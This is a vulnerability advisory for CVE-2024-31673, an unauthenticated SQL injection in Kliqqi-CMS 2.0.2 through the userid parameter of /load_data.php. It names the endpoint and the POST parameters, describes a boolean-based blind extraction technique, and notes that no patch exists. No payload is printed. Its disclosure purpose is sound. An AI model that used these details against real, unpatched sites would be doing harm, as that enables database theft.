CVE-2024-31673

Vulnerability

Kliqqi-CMS version 2.0.2 contains a SQL injection vulnerability in the /load_data.php script. The userid parameter is not properly sanitized before being used in a database query, allowing an attacker to inject arbitrary SQL statements. The vulnerability is triggered via a POST request with parameters such as pagesize, pname, start_up, userid, and view. The issue is documented in the project's GitHub issue tracker [1].

Exploitation

An attacker can exploit this vulnerability by sending a crafted POST request to /load_data.php with a malicious userid parameter. No authentication is required. The provided proof-of-concept script demonstrates a boolean-based blind SQL injection technique that extracts the database name character by character by observing the response length. The attacker can modify the payload to extract other database contents [1].

Impact

Successful exploitation allows an attacker to extract sensitive information from the database, such as the database name, table names, and potentially user credentials or other application data. The impact is limited to information disclosure; no remote code execution or privilege escalation is indicated in the available references [1].

Mitigation

As of the publication date, no official patch has been released for this vulnerability. Users are advised to apply input validation and parameterized queries to the userid parameter in /load_data.php as a workaround. The issue remains open in the project's repository [1].